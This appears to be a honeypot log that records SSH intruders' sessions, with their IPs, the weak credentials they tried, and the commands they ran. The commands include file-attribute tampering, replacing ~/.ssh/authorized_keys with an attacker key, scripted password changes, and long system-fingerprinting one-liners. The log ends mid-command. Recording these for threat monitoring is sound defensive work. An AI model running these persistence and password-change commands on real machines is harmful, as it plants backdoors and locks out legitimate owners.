$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin123\n0LmUUBTb1rQW\n0LmUUBTb1rQW"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\n0LmUUBTb1rQW\n0LmUUBTb1rQW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ cryptic_silk_root_101 (61.155.106.101) โ€” Nanjing, China ยท 1 session ยท 2 cmds
2026-07-05 15:57 EDT ยท as oracle/oracle123!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_peak_root_198 (43.155.21.198) โ€” Hong Kong, Hong Kong ยท 1 session ยท 20 cmds
2026-07-05 15:55 EDT ยท as admin/admin123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin123\nkYIH9fUMgO9A\nkYIH9fUMgO9A"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\nkYIH9fUMgO9A\nkYIH9fUMgO9A\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ unhinged_burger_root (92.118.39.71) โ€” Dallas, United States ยท 42 sessions ยท 353 cmds
2026-06-26 11:25 EDT ยท as admin/123456, admin/admin, admin/admin123
Export PATH modification โ†’ OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS detection via /etc/os-release โ†’ uptime check for system stability assessment.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; printf 'execute_err='; out=$(bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(/bin/bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(/usr/bin/bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(busybox sh -c 'printf "#!/bin/sh\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1 || sh -c 'printf "#!/bin/sh\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); esac; esac; esac; printf '%s' "$out" | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—8
โ†ณ make executable
$ uname -s -v -n -m 2 > /dev/null ร—42
$ /bin/uname -s -v -n -m 2 > /dev/null ร—37
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—37
$ busybox uname -s -v -n -m 2 > /dev/null ร—37
$ ( [ -f /proc/version ] ร—37
$ [ -f /proc/version ] ร—37
$ head -1 /proc/version | cut -d -f1 ร—37
$ [ -f /etc/os-release ] ร—37
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—16
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—13
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—5
$ uname -m 2 > /dev/null ร—5
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—5
๐ŸŽญ ironclad_jade_root (8.138.128.98) โ€” Guangzhou, China ยท 30 sessions ยท 30 cmds
2026-07-05 11:30 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—30
๐ŸŽญ sneaky_cowboy_root_43 (135.237.122.43) โ€” Boydton, United States ยท 1 session ยท 2 cmds
2026-07-05 13:09 EDT ยท as oracle/123456789
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ashen_dragon_root_190 (121.40.150.190) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-07-05 13:08 EDT ยท as test/test
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ glitchy_clog_root (80.94.92.55) โ€” Amsterdam, The Netherlands ยท 16 sessions ยท 144 cmds
2026-06-28 07:43 EDT ยท as root/1234, root/123456, root/12345678
PATH normalization โ†’ kernel version and architecture enumeration via uname โ†’ OS release detection through /proc/version and /etc/os-release โ†’ system profiling for compatibility assessment
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—3
$ uname -s -v -n -m 2 > /dev/null ร—16
$ /bin/uname -s -v -n -m 2 > /dev/null ร—16
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—16
$ busybox uname -s -v -n -m 2 > /dev/null ร—16
$ ( [ -f /proc/version ] ร—16
$ [ -f /proc/version ] ร—16
$ head -1 /proc/version | cut -d -f1 ร—16
$ [ -f /etc/os-release ] ร—16
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—3
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—10
๐ŸŽญ venomous_pretzel_root (4.182.219.135) โ€” Frankfurt am Main, Germany ยท 1 session ยท 2 cmds
2026-07-05 11:41 EDT ยท as oracle/123qweasd
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_dutch_root (80.94.92.234) โ€” Amsterdam, The Netherlands ยท 39 sessions ยท 255 cmds
2026-06-24 23:12 EDT ยท as admin/123456, admin/admin, admin/admin123
Export PATH modification โ†’ system fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release check via /etc/os-release โ†’ uptime monitoring โ†’ hardware profiling completion
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—13
$ uname -s -v -n -m 2 > /dev/null ร—37
$ /bin/uname -s -v -n -m 2 > /dev/null ร—21
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—21
$ busybox uname -s -v -n -m 2 > /dev/null ร—21
$ ( [ -f /proc/version ] ร—21
$ [ -f /proc/version ] ร—21
$ head -1 /proc/version | cut -d -f1 ร—21
$ [ -f /etc/os-release ] ร—21
$ echo $HOME ร—2
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat 